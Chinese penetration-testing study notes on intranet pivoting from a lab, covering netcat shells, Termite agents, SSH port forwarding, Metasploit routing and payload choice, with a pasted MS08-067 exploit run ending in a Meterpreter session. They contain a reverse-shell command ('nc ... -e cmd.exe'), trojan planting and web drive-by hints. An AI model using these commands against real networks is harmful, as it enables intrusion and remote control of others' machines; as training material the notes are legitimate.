CS的下载+内网穿透

CS的下载

纵向渗透：NC 瑞士军刀菜刀是一个hyyp协议         NC是TCP

NC连接后没有任何回显

先受控房  nc.exe -l -p 12345

然后攻击方  nc.exe ip port 12345

扫描端口

上传和 nc.exe 同一目录下的文件

跳板机工具和NC的实际操作以及Termite联合管理

和nc是一样的先开监听 要先把agent对应系统文件上传到目标然后运行  然后我们的机子就是用命令连接 但是根据网络拓扑图 我们现实情况要更复杂些  接下来我将解释为什么复杂

首先目标机获取shell 使用命令 uname -r 输出操作系统信息看看版本

然后找到对应版本然后将我们的agent文件上传上去

1.物理机连接03  这是第一个被我们趁虚而入的机子 我们可以

nc -nvv 可以显示机子的详细信息、

当然这是对面没有防火墙的方法现实中 我们要利用对面的shell 我们通过对面主动连接我们然后我们再操控对面 看第二点使用的命令

2.我们物理机

nc -l -p 12345

然后服务器:

nc 192.168.0.106 12345 -t -e cmd.exe 这样就是对面服务器通过防火墙主动连接我们

这样我们是控制对面的shell

3.接下来我们物理机输入几个命令 就能这样 物理机 -> 03 -> 07 -> 最深的渗透目标

首先

然后

show查看我们连接上的是不是03

然后goto 1 代表我们进入03跳板机里面    

然后连07

goto3 就是进入win7

然后我们用7连最后的红帽我们最终的目标

上传文件的命令

SSH的正向代理

现在先开始搭建环境

我们把03网段修改为

将03的8001端口转发到本地

root@ip 是用红帽的ip  我们用红帽的用户发送命令给03让03把ssh的端口映射给我们本地物理机

把自己本地的ip映射上去作用是 只有红帽才能入侵内网的机器

将红帽当成VPS

我们将自己的payload写好后 端口映射给红帽

当机器找我们这个红帽端口80 就会访问我们的网页 

我们可以进行网页挂马

反向连接上面就是

SSH配置socket代理

用ssh -D 连接完后如下图步骤 修改conf

将socks4 改为我们映射的端口

然后执行命令利用红帽扫描内网信息

linux反弹shell

常见的http隧道 下面这几个都是工具

什么时候用隧道

防火墙的内网里 服务器链接数据库 我怎么怎么把数据库的东西交给我们物理机 就需要使用隧道

主要还是为了做端口转发

二一个是不能出网不能和MSF建立会话

网上找攻略搜索HTTP隧道端口转发

实战才能累计经验

重点！！MSF网络穿越

首先03当做我们获取的第一个肉机也就是跳板机 他是80

03有个win7 我们渗透玩win7

win7还有红帽 

红帽处于有两个网段

一个和 win7 03 一样的 80 同时win7还有个10现在我们要渗透20网段

详细解释如图

把1.exe 也就是木马文件放在被攻击的网站上

依次如下图tab找到对应漏洞

 

最终示例是这个漏洞

以下是ppt内容是总的教程

得到shell后 使用模块shell命令后使用ipconfig

查询ip

发现了多了一个20网段 同时有2个网段 一个是80 一个 是20

然后我们先在80网段连接10网段 10网段是一个路由的网段

利用

run autoroute 控制路由

先获取 然后给我们的控制好的shell机子添加这个10网段的路由

添加好自己的网段身份后我们用 MSF port查找模块 来进行信息收集

加好了之后我们也可以尝试使用nmap

添加socks代理 进行扫描所有子网段

set老大这里没有set什么直接run了 有需要可以网上搜一下这个命令需要修改什么

run后我们 在另一个终端使用 vi 命令 修改如图的文件（刚刚改过）

然后我们把下图8081端口修改为1080

然后就可以如下命令使用nmap扫描

联合goby扫描

利用某些漏洞时记得设置也就是直连payload防止出不来 解释如下

msf中如何选择payload，这里给你解释

weixin_44270509

于 2019-08-09 15:07:23 发布

阅读量3.9k
 收藏 24

点赞数 1
版权
Metasploit中的 Payload 模块
一。类型(三种基础的)
二。名称和格式
三。 Stager中几种常见的payload（metepreter为主）
因为有一阵子天天弄不清楚到底选择哪个payload而感觉脑壳痛，所以查了很多资料，我大致在这里总结一下

一。类型(三种基础的)
1-Single： 是一种完全独立的Payload，而且使用起来就像运行 calc.exe 一样简单，例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的，因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。
*
2-Stager（一般是最后的那一部分）：这种Payload负责建立目标用户与攻击者之间的网络连接，并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp，它可以让目标系统与攻击者建立一条tcp连接，让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp，它可以让目标系统开启一个tcp监听器，而攻击者随时可以与目标系统进行通信(正向连接)。
*
3-Stage（一般是第二部分）： 是Stager Payload下的一种Payload组件，这种Payload可以提供更加高级的功能，而且没有大小限制。

二。名称和格式
Single Payload 的格式为：<>/ 如：windows/powershell_bind_tcp
Stager/Stage Payload的格式为：/ / 如：windows/meterpreter/reverse_tcp

三。 Stager中几种常见的payload（metepreter为主）
windows/meterpreter/bind_tcp #正向连接(不常用，信息量太大，易出错)
windows/meterpreter/reverse_tcp #反向连接(常用)
windows/meterpreter/reverse_http #通过监听80端口反向连接
windows/meterpreter/reverse_https #通过监听443端口反向连接
正向连接使用场景：我们的攻击机在内网环境，被攻击机是外网环境，由于被攻击机无法主动连接到我们的主机，所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是，被攻击机上开了防火墙，只允许访问指定的端口，比如被攻击机只对外开放了80端口。那么，我们就只能设置正向连接80端口了，这里很有可能失败，因为80端口上的流量太多了

反向连接使用场景：我们的主机和被攻击机都是在外网或者都是在内网，这样被攻击机就能主动连接到我们的主机了。如果是这样的情况，建议使用反向连接，因为反向连接的话，即使被攻击机开了防火墙也没事，防火墙只是阻止进入被攻击机的流量，而不会阻止被攻击机主动向外连接的流量。

反向连接80（http）和443（https）端口使用场景：被攻击机能主动连接到我们的主机，还有就是被攻击机的防火墙设置的特别严格，就连被攻击机访问外部网络的流量也进行了严格的限制，只允许被攻击机的80端口或443端口与外部通信

利用ms08067攻击

• Module options (exploit/windows/smb/ms08_067_netapi):

•    Name     Current Setting  Required  Description

•    ----     ---------------  --------  -----------

•    RHOST    7.7.7.20         yes       The target address

•    RPORT    445              yes       The SMB service port

•    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

• Payload options (windows/meterpreter/bind_tcp):

•    Name      Current Setting  Required  Description

•    ----      ---------------  --------  -----------

•    EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)

•    LPORT     4444             yes       The listen port

•    RHOST     7.7.7.20         no        The target address

• Exploit target:

•    Id  Name

•    --  ----   0   Automatic Targeting

• msf exploit(ms08_067_netapi) > run

• [*] Started bind handler

• [*] 7.7.7.20:445 - Automatically detecting the target...

• [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown

• [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English

• [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX)

• [*] 7.7.7.20:445 - Attempting to trigger the vulnerability...

• [*] Sending stage (957999 bytes) to 7.7.7.20[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444)

meterpreter >

端口复用